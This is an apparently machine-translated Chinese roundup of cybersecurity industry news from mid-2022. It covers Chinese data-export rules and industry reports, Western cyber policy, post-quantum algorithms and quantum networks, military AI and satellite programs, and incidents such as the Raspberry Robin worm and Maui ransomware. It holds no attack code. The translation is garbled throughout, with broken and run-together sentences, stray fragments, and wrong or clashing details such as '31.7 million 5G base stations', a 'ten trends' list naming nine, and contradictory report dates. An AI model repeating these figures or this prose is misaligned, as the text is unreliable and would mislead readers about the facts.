Review of important events and gain an insight into the development of the cybersecurity industry. What important events have occurred in the cyber security industry at home and abroad recently, and what kind of development trend is it showing? The China Cybersecurity Science and Technology Intelligence Research Team will start from an industry perspective and lead everyone to review recent important events in the industry at home and abroad and explore the development trends.
domestic
"Outlook of the Ten Future Trends in Cybersecurity" released
From July 2 to 3, the 2022 West Lake Forum Cyber Security Conference with the theme of "Building a Secure and Trustworthy Digital World" was held simultaneously in Hangzhou and Beijing. In order to work together to respond to the new situations and challenges faced by network security and further empower the industry to develop high-quality , the results of the "Top Ten Future Trends in Network Security" collection and selection results were released during the conference.
The ten major trends are: top-level network security design, active immune trusted computing, privacy computing, data security governance, new technology and new application security, critical information infrastructure security protection, network security insurance, software supply chain security, and digital currency security. , the integration of network security education, technology and industry.
This solicitation and selection event is guided by the Cyber Security Research Institute of the China Cyberspace Academy, hosted by the Media Center of China Cyberspace Magazine and the Cybersecurity Channel of Guangming.com, with technical support provided by Anheng Information. The event solicited extensive solicitation through targeted invitations to cybersecurity academies, research institutions, network information companies, and public declarations. It also combined online voting from netizens and expert opinions to ultimately form ten major trend prospects, providing a forward-looking perspective for industry innovation and development and policy and regulation research and formulation. and reference.
"Global Blockchain Industry Development Report (2021-2022)" was released
On July 5, the third "Industrial Information Security Think Tank" forum was successfully held at National Industrial Information Security Development Research Center . Pan, Director of the Software Institute Yan released the "Global Blockchain Industry Development Report (2021-2022)" (hereinafter referred to as the "Report"). The
report systematically sorts out the blockchain policy formulation, technological breakthroughs, and application implementation in various countries around the world through comprehensive and three-dimensional research on more than 10 countries/regions, more than 20 industry segments, and more than 3,000 companies. The latest trends, studied the logic, models, and paths behind them, and looked into the future development trends. The report points out that opportunities and challenges coexist in the development of the blockchain industry, and the country urgently needs to strengthen the integrated development of independent technology research and industry applications. At the same time, blockchain technology is moving from usable to easy to use, showing development trends such as cloud-chain integration and integration of software and hardware. In the context of the epidemic promoting the digital transformation of to in various industries, blockchain is accelerating its integration with traditional industries, and more applications will appear in areas such as dual carbon and data elements. The
report was led by the National Industrial Information Security Development Research Center and jointly compiled by Beijing University of Posts and Telecommunications, Beijing University of Aeronautics and Astronautics, and Ant Group Research Institute. It received strong support from all participating units and experts from industry, academia, and research.
In the next step, the National Industrial Information Security Development Research Center will rely on the Key Laboratory of Blockchain Technology and Data Security of the Ministry of Industry and Information Technology to continue to carry out blockchain technology tracking research and work with all parties in industry, academia and research to jointly promote the development of the industry.
The Cyberspace Administration of China announced the "Measures for Security Assessment of Data Exit"
On July 7, the Cyberspace Administration of China announced the "Measures for Security Assessment of Data Exit" (hereinafter referred to as the "Measures"), which will come into effect on September 1, 2022. The relevant person in charge of the Cyberspace Administration of China stated that the "Measures" are intended to implement the provisions of the " Cyber Security Law ", " Data Security Law ", and " Personal Information Protection Law ", regulate data export activities, and protect individuals. Information rights and interests, safeguarding national security and social public interests, promoting the safe and free flow of data across borders, and ensuring development with security and promoting security with development.
The "Measures" clarify that these Measures are applicable to the security assessment of important data and personal information collected and generated by data processors provided overseas by during its domestic operations in the People's Republic of China. It is proposed that data export security assessment adheres to the principles of combining prior assessment with continuous supervision, and combining risk self-assessment with security assessment.
The "Measures" stipulate the circumstances under which data export security assessments should be reported, including data processors providing important data overseas, critical information infrastructure operators and data processors processing the personal information of more than 1 million people providing personal information overseas, Data processors that have provided personal information of 100,000 people or sensitive personal information of 10,000 people to overseas countries since January 1 last year have provided personal information overseas and other situations stipulated by the national cyberspace department that require declaration of data export security assessment.
The "Measures" put forward specific requirements for data export security assessment, stipulating that data processors should conduct a data export risk self-assessment and clarify key assessment matters before applying for data export security assessment. It is stipulated that the data processor shall clearly stipulate the data security protection responsibilities and obligations in the legal documents entered into with the overseas recipient. During the validity period of the data export security assessment, circumstances affecting the data export security shall be re-applied for assessment. In addition, it also clarified data export security assessment procedures, supervision and management systems, legal responsibilities, and compliance and rectification requirements.
Ministry of Industry and Information Technology: The scale of my country's big data industry reaches 1.3 trillion yuan
"According to estimates, the scale of my country's big data industry will reach 1.3 trillion yuan in 2021, gradually entering the stage of high-quality development." The fifth Digital held on the 5th At the press conference of the China Construction Summit, Wang Jianwei, deputy director of the Information Technology Development Department of the Ministry of Industry and Information Technology, introduced that in recent years, the Ministry of Industry and Information Technology has issued the "14th Five-Year Plan for Big Data Industry Development" to accelerate the construction of information infrastructure. , carried out industry demonstration applications, built industrial clusters, and achieved positive progress. Mainly reflected in three aspects.
First, the industrial foundation is increasingly consolidated. The data resources are extremely rich, and the total amount ranks among the top in the world. Industrial innovation is becoming increasingly active, with the total number of patent applications accounting for nearly 20% of the world's total. Infrastructure continues to be consolidated. As of May this year, a total of 31.7 million 5G base stations have been built and opened, making it the first country in the world to build a large-scale 5G network based on independent networking mode. 5G base stations account for 16% of the total number of mobile base stations.
Second, the industrial chain has initially taken shape. 604 typical big data pilot demonstrations have been selected across the country, new products and new models are constantly emerging, and a big data product and service system has been initially formed. Beijing, Shanghai and other places have successively established data exchanges to actively explore new formats for the circulation and utilization of data elements. The numerical control rate of key processes in industrial enterprises above designated size and the penetration rate of digital R&D and design tools have reached 55.5% and 75.0% respectively. The integration of big data with manufacturing, finance, medical and other fields continues to deepen.
Third, the ecosystem is continuously optimized. Regional agglomeration has achieved remarkable results. It has built 12 national new industrialization industry demonstration bases in the field of big data, promoted the formation of 14 famous Chinese software cities, and established the first independent open source foundation. A number of national standards such as the "Data Management Capability Maturity Assessment Model" DCMM have been formulated and released, and a number of leading big data companies have emerged rapidly, initially forming a development pattern in which large companies lead, small and medium-sized enterprises collaborate, and innovative companies continue to emerge.
Shanghai: The scale of Yuanverse-related industries will reach 350 billion in 2025
On July 8, 2022, Shanghai held a municipal government press conference. Wu Jincheng, Director of the Municipal Economic and Information Technology Commission, introduced Shanghai’s three action plans to promote the development of green and low-carbon industries, cultivate a new track in the "Yuanverse", and promote the high-quality development of the intelligent terminal industry. Qiu Wenjin, Deputy Director of the Municipal Development and Reform Commission Qiu Wenjin , Wang Ye, deputy director of the Municipal Science and Technology Commission, and Wu Qiang, deputy director of Pudong New Area , jointly attended the press conference and answered reporters' questions.
Seizing new tracks and cultivating new momentum is Shanghai’s strategic direction to build its future development advantages, and it is also an important starting point for accelerating economic recovery and revitalization.In accordance with the requirements of the municipal party committee and the municipal government to strengthen the "new track" layout and strengthen the "terminal drive", three action plans were formulated for the development of green and low-carbon, metaverse, and intelligent terminal industries.
Among them, the Metaverse is an important platform for the interaction between the virtual world and the real society in the future. It is a new manifestation of the digital economy and has huge potential. We will adhere to the combination of virtual and real, and use virtual and real value-oriented, give full play to Shanghai's advantages in 5G, data elements, application scenarios, online new economy, etc., and promote the digital transformation of Yuanverse to better empower the economy, life, and governance; strive to build 10 companies with Leading companies with international competitiveness and 100 "specialized, special and new" companies will launch 50+ demonstration scenarios and 100+ benchmark products and services. By 2025, the industry scale will reach 350 billion.
Specifically, the focus is on the implementation of “four actions + eight projects”. Four actions, such as the industrial highland construction action, focus on holographic display, future network, VR/AR/MR terminals, 3D image engines, etc. to enhance industrial supply; the model integration and empowerment action supports Metaverse + Factory , medical, entertainment, office and other scene creation; there are also actions to upgrade digital business formats and cultivate innovative ecosystems. In terms of eight projects, such as the key technology breakthrough project, organize enterprises to take the lead; the digital IP market cultivation project, pilot Shanghai Digital Exchange to open a digital asset trading section, promote the standardized development of digital creative industry ; the industrial innovation carrier cultivation project, layout one A batch of characteristic industrial parks; there are also projects such as all-round improvement of digital people, digital twin space, and digital space risk management.
foreign
1. Cyberspace security policy and management dynamics
U.S. and Israeli organizations are invited to help strengthen mutual cybersecurity
According to reports on July 1, the U.S. Department of Homeland Security announced that the United States and Israel have established a new partnership aimed at improving both Cyber resilience of the country’s critical infrastructure. As part of a joint program, the Department of Homeland Security's Science and Technology Directorate and Israel's National Cyber Agency will provide up to $1.5 million in funding for projects that promise to strengthen cybersecurity capabilities, Nextgov reported Thursday.
The Science and Technology Council said in its announcement that the Industrial Research and Development Network program between the two countries aims to fund the development of emerging technologies that are mutually beneficial. It was explained that this effort incentivized U.S. and Israeli entities to collaborate to address mission-critical cybersecurity needs. Department of Homeland Security Under Secretary Robert Silvers said the BIRD cyber program is designed to leverage the innovation and ingenuity of the Israeli and U.S. technology sectors to advance security and resiliency. He emphasized that DHS is committed to working directly with international partners, including those in the private sector, to address the most pressing cybersecurity challenges. Specifically, the request for proposals calls for "a collaborative project between two companies, or between a company and a university or research institution - one from the United States and one from Israel. The deadline for submitting executive summaries is November 15, 2022 Confirmed. Joint investment in public-private partnerships is expected to result in national-level cybersecurity solutions, INCD Director General Gaby Portnoy said, expressing hope that increased cyber cooperation between the allies will help address common security concerns. Management ignores smart factory cyber threats html reported on July 1 that Capgemini Research, a global consulting firm, collected responses from cybersecurity leaders at 950 organizations to compile its report "Smart and Secure: Why Smart Factories Need to Prioritize Cyber Security. The report shows that while more than half (51%) of respondents predict that the number of attacks on smart factories will increase in the next 12 months, a similar number (47%) say security is not a concern for their organizations C-level issues in.
This disconnect between business and cybersecurity leaders is common across industries, and in research published last month, 54% of UK and US chief information security officers complained about their boards. Not enough money has been released for important initiatives.
Geert van der Linden, head of Capgemini’s cybersecurity business, believes that operational technology (OT) and industrial Internet of Things (IIOT) devices have expanded the cyber attack surface, making smart factories an important target for threat actors. “The benefits of digital transformation have manufacturers looking to invest heavily in smart factories, but if cybersecurity is not reflected in the offsets, these efforts can be wasted in the blink of an eye,” he added. "Unless this is made a board-level priority, organizations will struggle to overcome these challenges, educate their employees and vendors, and streamline communication between cybersecurity teams and executives.
NATO Madrid Summit announces enhanced cyber posture
7 It was reported on June 4 that North Atlantic Treaty Organization (NATO) held its annual summit in Madrid, Spain from June 29th to 30th. During the meeting, NATO's situation against cyber threats, space threats, hybrid threats and other asymmetric threats was assessed. , and evaluated the malicious use of emerging and disruptive technologies.
NATO stated that it will strengthen its deterrence and defense posture to respond to threats and challenges in all domains, including land, air, sea, cyber and space. Accelerating adaptation in all areas, improving cyber resilience and enhancing interoperability, NATO will also expand partnerships with the business community to voluntarily use national assets to form and apply virtual cyber rapid response capabilities to respond to major malicious networks. activity.
NATO also highlighted its support for Ukraine , stating that it is committed to improving Ukraine’s cyber defense capabilities and cyber resilience and supporting the modernization of its defense sector in the transformation process, thus strengthening the relationship between NATO and Ukraine in the long term.
The Israeli government cooperates with Boeing Company to protect aviation industry cybersecurity
reported on July 5 that following the announcement of the joint cyber plan between the Israeli government and the U.S. Department of Homeland Security, the Israeli National Cyber Directorate (INCD) and American Airlines and the military giant Boeing have signed a cooperation agreement to provide cyber security for the aviation industry
The two parties will not only cooperate in network services, but also commit to sharing network intelligence in all aspects and identifying network threats in advance. , to jointly prepare for cyber threats, mitigate the harm caused by malicious cyber activities, and provide various cyber defense solutions for civil airports , INCD Chief Technology Officer Tomer Goren said he hopes. Other major defense companies including Airbus and other countries could also join in this type of airport cyber defense cooperation
The Justice Department identified prosecuting ransomware and cyberattacks as a key goal in the new strategic plan
July 5 The Justice Department said on Friday it would make prosecuting ransomware attacks and cyber-disruption criminals a key goal as part of a new strategic plan.
The department said in a statement that it intends to strengthen its cybersecurity technology. capabilities and more aggressively pursue those who put U.S. Government information or assets at risk.
"The department will work to bring to justice those who carry out cyberattacks, whether they are independent actors, members of transnational organized crime groups, or acting on behalf of nation-states or terrorist groups. At the same time, the department will work to Disrupt and dismantle online infrastructure that facilitates cyberattacks and confiscate the criminal proceeds of such crimes," the Justice Department said.
NIST selects 4 algorithms to defend against quantum computers
reported on July 5 that the National Institute of Standards and Technology (National Institute of Standards and Technology) has selected four quantum-resistant encryption algorithms that it will standardize to Protecting sensitive data from quantum computers were the first winners announced Tuesday.
NIST has chosen the CRYSTALS-Kyber algorithm for general encryption of data exchanged over public networks, while the CRYS-Dilithium, FALCON and SPHINCS+ algorithms are used for digital signatures, often used to verify identities during transactions.
The announcement is the culmination of a six-year, four-round competition to refine encryption candidates, with the goal of incorporating some into the post- quantum encryption standard expected to launch in 2024. Agencies are concerned that China and other nation-states are developing quantum computers capable of breaking the public-key cryptography that protects most federal systems.
Pentagon on the lookout for some good hackers - Bug Bounty Program
reported on July 6 that the Pentagon has been accepting vulnerability reports from security researchers since 2016, most recently shutting down the military to the public internet in 2021 alone. More than six thousand vulnerabilities on IT systems.
The program will run until July 11. The announcement comes shortly after HackerOne concluded its year-long bug bounty testing with dozens of volunteer companies from the defense industrial base.
Over the past decade, bug bounties have entered the mainstream, especially as major tech companies including Google , Facebook and Microsoft have established programs to accept unsolicited reports from outside researchers. A common criticism is that legitimate rewards for responsible disclosure are offset by what the open market offers for vulnerabilities.
The U.S. Defense Bill promotes the protection of the nation’s important critical infrastructure
On July 7, the U.S. Congress’s main measure on cybersecurity was an effort to seek to amend the annual defense policy legislation to include cyber protection of the nation’s most important critical infrastructure.
Rhode Island Democrat Jim Langevin, who chairs the House Armed Services Committee’s cyber subcommittee and serves on the Cyberspace Solarium Committee, drafted an amendment to strengthen defenses for systemically important critical infrastructure (SICI) . The amendment ties the definition of the term to infrastructure for critical national functions, where the federal government says a disruption would have a disruptive impact on the security, national economic security , national public health or security.
UK combats Russian disinformation
On July 7, the British government will amend the recently introduced Internet Security Bill to include provisions to combat disinformation from Russia and other hostile countries. Social media should proactively seek out and remove disinformation that is harmful to the UK from foreign government entities, and companies that fail to respond to state interference could face hefty fines or be blocked in the UK.
The government will introduce an amendment to link the National Security Bill to the Internet Safety Bill to strengthen internet legislation and make the UK the safest place in the world to go online. The bill requires social networks, search engines and online services to take action to identify and remove disinformation sponsored by foreign governments to interfere in British affairs.
Singapore releases Code of Practice for Cybersecurity of Critical Information Infrastructure
On July 5, under the Cybersecurity Act, the Cyber Security Authority of Singapore (CSA) released a code of practice for the supervision of critical information infrastructure (CII) owners. or performance standards. CCoP 2.0 (Critical Information Infrastructure Cybersecurity Code of Practice - Second Edition) will take effect on July 4, 2022, replacing the previous version of the code. The document aims to specify the minimum requirements that critical information infrastructure owners (CIIOs) should implement to ensure CII’s cybersecurity.
2. Information, communication and network security technology development
Quantum network between two national laboratories achieves record synchronization
Reported on June 27, the quantum collaboration demonstrated the development of functional long-distance quantum networks through deployed telecommunications optical fibers at Chicago A first step that opens the door to scalable quantum computing.
The world is waiting for quantum technology. Quantum computing promises to solve complex problems that cannot be solved by current or classical computing.Quantum networks are critical to realizing the full potential of quantum computing, enabling breakthroughs in our understanding of nature and applications that improve our daily lives. But making it a reality requires the development of accurate quantum computers and reliable quantum networks, leveraging current computer technology and existing infrastructure.
Recently, as a demonstration of the potential and a first step toward functional quantum networks, a team of researchers at the Illinois Express Quantum Network (IEQNET) successfully deployed one between U.S. Department of Energy (DOE) laboratories using local optical fiber. Long-distance quantum networks. The experiment marks the first time that quantum-encoded photons (the particles that carry quantum information) and classical signals are transmitted simultaneously over metropolitan-scale distances at an unprecedented level of synchronization.
IEQNET collaborations include the U.S. Department of Energy's Fermi National Accelerator and Argonne National Laboratory , Northwestern University and California Institute of Technology . Part of their success stems from the fact that its members cover the breadth of computing architectures from classical and quantum to hybrid.
"Having two national laboratories 50 kilometers apart working on quantum networks with such shared technical capabilities and expertise is not a trivial thing," said Fermilab Quantum Science Program Director and said Panagiotis Spentzouris, lead researcher on the project. "You need a diverse team to solve this very difficult and complex problem. For that team, synchronization proved a tamed beast. Together they showed that it is possible for quantum and classical signals to be on the same network fiber Coexist and synchronize across metropolitan-scale distances and real-world conditions
Ernst & Young partners with National Quantum Computing Center to launch 2022 quantum readiness study
A recent study found that 81% of UK businesses Leaders expect quantum computing to disrupt industries by 2030
EY’s 2022 Quantum Readiness Survey, conducted in partnership with the National Quantum Computing Center (NQCC), found that 81% of UK senior managers expect quantum computing to be in their industry by 2030.
Quantum computing is still in its relative infancy as a technology, but its transformative potential is already being recognized by UK business leaders, despite growing expectations from senior leaders. Strategic planning for computing is still in its early stages. Dr. Simon Plant, deputy director of innovation at the National Center for Quantum Computing, said: "Quantum computing has the potential to significantly speed up the solution time for certain tasks and solve computing problems that are currently difficult to solve using traditional digital technology . The pace of development is accelerating, and the question is how and when (not if) quantum computing can address industrially relevant use cases. There is a first-mover advantage in preparing to leverage these capabilities and building resilience into forward planning.
QuSecure Lands SBIR Post-Quantum Cybersecurity Software Phase 3 Contract
html Reported on July 1, QuSecure announced that it has been awarded a Small Business Innovation Research Phase 3 contract to provide its end-to-end post-quantum cybersecurity technology.
In May, President Biden issued a memo highlighting the potential of quantum computing to drive innovation in different sectors of the economy. But the president also warned of the safety concerns of the technology. A sufficiently powerful quantum computer — or a quantum computer as related to cryptanalysis — could defeat the encryption used to protect communications, critical infrastructure and Internet-based financial transactions, the memo reads.
U.S. Army Merge Data Analysis, Battle Management Programs
Officials with the U.S. Army's Major Information Systems and Network Technology Directorate are working to merge two major programs - data analysis and battle management - into a cohesive capability, the Army reported on July 5. The goal is to leverage the new joint program into the Army's burgeoning data structure development efforts.
Program officers from the Program Executive Office Enterprise Information Systems (PEO EIS) and Program Executive Office Command, Control and Communications-Tactical (PEO C3T) are integrating PEO EIS’s “Vantage” data analytics and visualization platform with PEO C3T’s command post computing Environment (CPCE) program consolidation, said U.S. Army Chief Information Officer (CIO) Raj Iyer.
The latest satellite launched by the US Department of Defense includes interference avoidance, classified payloads
reported on July 6, Washington: Among the seven experimental satellites launched by Virgin Orbit last week for the Pentagon’s space test program, one was developed by the Air Force Research Experiment A "cognitive" radio frequency system built by AFRL aims to enable interference-proof, high-speed satellite communications through the fog of electronic warfare .
According to today's AFRL press release, the experimental CubeSat, called Recurve, uses artificial intelligence /machine learning to autonomously decide how to navigate a large constellation of interconnected satellites in Low Earth Orbit (LEO), known as the "Mesh" Network") routes data to ensure the right information is delivered to the right user in the right place at the right time.
DC-QNet Alliance Director Shares New Details of Quantum Network Testbed Plan
html reported on July 6 that six government agencies in Washington, D.C., and two out-of-region affiliates recently formed a new alliance to jointly create and ultimately adopt ultra-modern Quantum network test platform for connection. However, other organizations, including those from the private sector, may also have opportunities to conduct innovative experiments with the technology, the organization's executive director told FedScoop.
Through the newly launched Metropolitan Washington Quantum Network Research Consortium (DC-QNet), eight federal entities will contribute to a range of scientific and technological pursuits required by the U.S. Government and Department of Defense to implement functional quantum networks.
Quantum Information Science (QIS) is a buzzing emerging field that is increasingly being taken by the U.S. government and its competitors. This discipline attempts to apply phenomena related to quantum mechanics to process and transmit information. Quantum networking is an element of QIS that aims to one day provide the ability to securely distribute and share data between quantum computers, quantum sensor clusters and other devices.
Institutions participating in DC-QNet include the Army Research Laboratory, Naval Research Laboratory, Naval Observatory, National Institute of Standards and Technology (NIST), National Security Agency (NSA), and NASA. Naval Information Warfare Center Pacific and the Air Force Research Laboratory also participate as out-of-region affiliates.
Airbus will provide 42 satellites for U.S. military connectivity
It was reported on July 6 that Northrop Grumman recently announced the selection of Airbus Airbus U.S. Space Defense Inc. as its Commercial provider of satellite platforms for the proliferation of LEO constellations. Under the terms of the contract, Airbus America will provide 42 satellite "bus" platforms and support vehicle assembly, integration and testing.
In February, the Space Development Agency (SDA) selected Northrop to develop and deploy part of its Phase 1 Transport Layer (T1TL), which is designed to provide persistent, secure connectivity to the U.S. military and serve as Key elements of joint all-domain command and control.
Blake Bullock, vice president, Strategic Space Systems Communications Systems, Northrop Grumman, said: "The addition of Airbus America as one of our key commercial suppliers complements our end-to-end satellite systems integration and legacy communications missions. expertise. To provide this capability, Northrop decided to select Airbus as one of the satellite's primary commercial suppliers, including vehicle assembly, integration and testing. In May, Northrop selected Mynaric and Innoflight. Provider of laser communications and encryption/decryption capabilities as part of the program.
U.S. TITAN program selects C3 AI to provide next-generation AI/ML operations
reported on July 7 that Raytheon Technologies has selected the C3 AI application platform to provide next-generation AI and machine learning (ML) capabilities for the U.S. Army’s tactical intelligence target access The Node (TITAN) program provides ready-made solutions. A Raytheon Technologies team led by Raytheon Intelligence and Space is competing to design TITAN as the Army’s foundational solution for multi-domain operations.
TITAN is a tactical ground station designed to detect and track threats supporting long-range precision targeting, furthering the Department of Defense’s strategy to support the Joint Force C2 (JADC2) capabilities required to support U.S. national security interests. The C3 AI Application Platform will provide AI/ML model operations (ML Ops) for best-in-class third-party models across the TITAN enterprise, including cloud and intermittently connected edge environments.
"This effort combines Raytheon Intelligence & Space's expertise in aerospace and defense with C3 AI's proven expertise in enterprise AI to support critical national security interests with next-generation technologies," said C3 AI Chairman and said CEO Thomas M. Siebel. "We look forward to working with Raytheon Technologies to deliver this new AI-driven, future-ready mission-ready solution.
TITAN will ingest data from space and high-altitude, airborne and ground-based sensors to provide targetable data for defense systems. It will also Will provide multi-source intelligence support for targeting and provide commanders with situational awareness and understanding. Leveraging capabilities that support life-mode awareness and automatic target recognition, the TITAN solution will also help operators make sense of large volumes of data and prosecute with appropriate solutions. Target.
3. Security Industry News
Microsoft discovered the Raspberry Robin worm in hundreds of Windows networks
reported on July 1 that Microsoft said it had recently discovered a recently discovered worm on the networks of hundreds of organizations from different industries. Windows worm.
The malware, known as Raspberry Robin, spreads via infected USB devices and was first discovered by Red Canary intelligence analysts in September 2021. Cybersecurity firm Sekoia also observed its use of QNAP in early November. The NAS device acts as a command and control (C2) server [PDF], and Microsoft said it discovered malicious artifacts related to a worm created in 2019. Redmond's findings are consistent with those of the Red Canary detection engineering team, which also The worm was detected on the networks of multiple customers, some in the technology and manufacturing sectors. Although Microsoft observed the malware connecting to addresses on the Tor network, the threat actors have not yet exploited the access they gained to the victims' networks. .
Although they can easily escalate their attacks, as the malware can use legitimate Windows tools to bypass User Account Control (UAC) Microsoft shared this in a private threat intelligence advisory sent to Microsoft Defender for Endpoint subscribers. message and was seen by BleepingComputer. Abuse of legitimate Windows tools to infect new devices
As mentioned earlier, Raspberry Robin is spreading to new Windows systems via an infected USB drive that contains a malicious LNK file and the user clicks on it. Afterwards, the worm will use cmd to spawn an msiexec process.exe to launch a malicious file stored on the infected drive. It infects new Windows devices, communicates with its command and control server (C2), and executes using several legitimate Windows utilities. Malicious payloads: fodhelper (a trusted binary used to manage functionality in Windows settings), msiexec (a command-line Windows Installer component), and odbcconf (a tool used to configure ODBC drivers). "While msiexec.exe downloads and executes legitimate installation packages, adversaries also exploit it to deliver malware," Red Canary researchers explained.
The British Army’s social account was hacked
It was reported on July 3 that the British Ministry of Defense confirmed on the 3rd that the British Army’s “YouTube” account and “Twitter” account were hacked and used for propaganda. Cryptocurrency scams.
Hackers broke into the British Army's Twitter homepage, changing the Army account's profile picture, resume and cover photo to make it appear to be related to a cryptocurrency called The Possessed NFT, and the tweets posted would put users Links to fake cryptocurrency mining websites. In addition, hackers also invaded the British Army's YouTube account, deleted all videos, and changed its name and avatar to impersonate the legitimate investment company Ark Invest. The hackers then released a series of old videos of Musk, the world's richest man, and added content to the videos to lure users into participating in cryptocurrency scams.
After the incident, Twitter stated that it had locked and protected the British Army's account. YouTube did not respond, and the British Army stated that it was investigating the matter. The two accounts involved have now returned to normal.
CISA directs federal agencies to address Microsoft bug
reported on July 5 that in guidance released on Friday, the Cybersecurity and Infrastructure Security Agency gave agencies until July 22 to address a Microsoft security flaw that hackers could exploit. to take over the Windows domain.
Agencies must apply Microsoft's June 2022 patch, which detects anonymous connection attempts and blocks them, to all Windows endpoints.
CISA has temporarily removed the Local Security Agency (LSA) spoofing vulnerability - which agencies were required to remediate under Binding Operational Directive 22-01 issued in November - from its catalog of known exploited vulnerabilities - because a security update for the patch broke it Personal authentication of many people and authentication of universal access card certificates.
"Active Directory now looks in the certificate for the account's security identifier (SID) or a strong mapping between the certificate and the account," CISA's follow-up reads. "This guide provides information on how to apply the required fixes without breaking certificate authentication.
This vulnerability, CVE-2022-26925, allows an unauthenticated attacker to call LSA on the Remote Protocol (RPC) interface method and forces domain controllers to authenticate to them using Windows New Technology LAN Manager. Microsoft's patch blocks anonymous connection attempts in LSAPRC.
Microsoft considers man-in-the-middle attacks to be of high complexity, based on the Common Vulnerability Scoring System. The patch also fixes two other vulnerabilities: CVE-2022-26923 and CVE-2022-26931.
Pentagon: If you can find a way to attack us, we will pay you
reported on July 5, the US Department of Defense An extensive but brief bug bounty program has been created for reporting vulnerabilities in public-facing systems and applications.
Hack US is scheduled to launch on Independence Day and will run until July 11, with reward totals reflected in the severity of the flaw.
The Department of Defense has allocated up to $110,000 for vulnerability exploit tracking. Vulnerability points can bring in $500 or more for high-severity flaws, while critical vulnerabilities are worth at least $1,000 and are set aside for specific rewards. Up to $5,000, e.g. $3,000, for the best discovery of *.army.mil
The program is being run with bug bounty platform maker HackerOne, which operates a 10-year program in partnership with the Department of Defense. 12-month pilot program, which ended in April. Hack US adds monetary rewards to calculations
Germany unveils plan to deal with satellite cyberattacks
On July 5, the German Federal Office for Information Security (BSI) has released. IT baseline protection profile for space infrastructure amid concerns attackers may turn their sights to the skies
The document was published last week by Airbus Defense & Space, the German space agency German Aerospace Center (DLR) and BSI, among others. The result of a year of work by the company. It focuses on determining minimum requirements for satellite network security, which a cynic might say is a little late to the party given the speed at which companies like SpaceX are putting spacecraft into orbit.
Protection requirements for various satellite missions are classified from "normal" to "very high" with the aim of covering as many missions as possible.It also aims to cover information security from manufacturing to satellite operations.
The "normal" category is associated with limited and controllable damage. "High" is "damage with severe consequences that would severely limit the operation of the satellite system." As for "very high," an attack could cause a shutdown and be "catastrophic to the point of an existential threat to the operator or manufacturer."
Details Impressive, although the documentation is more of a baseline (via checklist) than a simple set of instructions for the various stages of a satellite's lifecycle including design, testing, shipping, commissioning operations and eventual decommissioning. Support the networks and applications on the spacecraft itself, right at the subnet or server room level.
As satellites become smarter, their attack surface area increases, so to speak, disrupting constellations and communications. Another front in the conflict. The European Space Agency (ESA) earlier this year invited hackers to hack its OPS-SAT spacecraft (in a controlled environment) to understand and address vulnerabilities
NATO will develop rapid cyber response capabilities
7 It was reported on March 4 that NATO has announced plans to develop virtual rapid response capabilities "to respond to major malicious cyber activities." These plans were announced in a statement after the NATO summit held in Madrid, Spain, earlier this year. At a time when Russia has invaded Ukraine, the recent summit has taken on additional significance because of concerns that the conflict could spread beyond current borders beyond NATO territory. Speaking of war, the declaration read: "We the Heads of State and Governments of the North Atlantic Alliance. The leaders gathered in Madrid as the war returned to the continent. We face a critical moment for our security and for international peace and stability.
Among other areas, the declaration outlines an agreement between member states to "establish and exercise virtual rapid response network capabilities on a voluntary basis and using national assets." The military alliance admitted, "We face network, space and hybrid and other asymmetric threats, as well as the malicious use of emerging and disruptive technologies.
Chrome has been exposed to serious zero-day vulnerabilities, and Google urges users to update as soon as possible.
reported on July 5 that recently, Google An announcement was made that Chrome 103.0.5060.114 update has been released for Windows users to address high-severity zero-day vulnerabilities exploited by attackers in the wild. This is also the fourth Chrome zero-day vulnerability patched by Google in 2022. Currently 103.0.5060.114. The version is rolling out in the Stable Desktop channel globally, and Google says it will take days or weeks to reach the entire user base.
Following the prompts, BleepingComputer went into the Chrome menu Help About Google Chrome and found that the update was available immediately when checking for new updates. At the same time, the web browser will automatically check for new updates and automatically install them after the next startup.
The UK signed an agreement to share biometric databases with US border guards
reported on July 4, according to The Register website on July 4. Plans signed with US to share biometric data on citizens held by police with US border officials
According to a member of the Council for Civil Liberties, Justice and Home Affairs in Europe (LIBE), the agency signed up with US Homeland Security last week. Department representatives held an informal meeting, and the United States requested the introduction of new visa requirements based on the International Biometric Information Sharing Initiative (IBIS) and with the support of the Enhanced Border Security Partnership (EBSP) to improve the U.S. Department of Homeland Security’s ability to pass biometric identification. Information sharing capabilities to detect threats.
LIBE Committee member Patrick Breyer said that during the meeting, the committee found that the UK and three EU member states had signed an agreement to reintroduce US visa requirements that allow access to police biometrics. Identifying the database.
The UK Home Office refused to deny it was signing up to the scheme. A spokesman said: "The UK has a long and close partnership with the US, which includes sharing data for specific purposes. We are regularly discussing with them new proposals or initiatives to improve public safety and enable legal travel.”
Under UK law, if the Biometrics Commissioner agrees, police can keep an individual’s DNA profile and fingerprint records for up to three years from the date the sample was collected, and police can apply for a two-year extension even if the individual is arrested but not charged. This The same applies to those charged but not convicted
The US Enhanced Border Security Partnership (EBSP) program will reportedly be voluntary initially, but starting in 2027, the US Visa Waiver Program (VWP) will become mandatory. Program that allows visa-free entry to the U.S. for up to 90 days
Federal agency says North Korea is behind manually executed ransomware attacks
July 6 reports state-sponsored actions from North Korea, according to FBI cybersecurity advisory The attacker is a little-known ransomware known as "Maui," working with the Cybersecurity and Infrastructure Security Agency and the Treasury Department
"The FBI, along with our federal partners, are working against us in the fight against North Korea. The healthcare sector remains vigilant regarding malicious cyber threats," Bryan Vorndran, assistant director of the FBI's Cyber Division, said in a press release about the advisory Wednesday. "We are committed to sharing information and mitigation strategies with our private sector partners to Help them strengthen their defenses and protect their systems.
Officials did not elaborate on why they linked the malware to North Korea, other than to point to the profit motive and urgency associated with attacking organizations in the health care sector.
"The FBI assesses that North Korean state-sponsored cyber actors have deployed Maui ransomware targeting healthcare and public health sector organizations," the advisory reads. “North Korean state-sponsored cyber actors may believe that healthcare organizations are willing to pay ransom because these organizations provide services critical to human life and health. Because of this assumption, the FBI, CISA, and Treasury Department assess North Korean state-sponsored Actors may continue to target HPH unit groups.
The advisory is based on FBI observations and incident response activities dating back to May 2021, as well as a report released Wednesday by threat intelligence firm Stairwell on the Maui operation.
Apple Stepping up its war on spyware, a growing digital scourge
html reported on July 6 that Apple will launch a feature this fall that will allow users to lock down services that might otherwise be exploited by malicious hackers. , these hackers hope to infect their phones with spyware. While the company anticipates that only a small percentage of users may ultimately need the optional enhanced security layer, the tool highlights Apple's ongoing battle with the growing global spyware industry
Apple. The "lockdown mode" is designed to make it harder for attackers to take over a victim's phone by blocking most forms of message attachments and preventing unknown connections to computers or accessories.
The U.S. Department of Defense's Office of Inspector General seeks to migrate data to Cloud
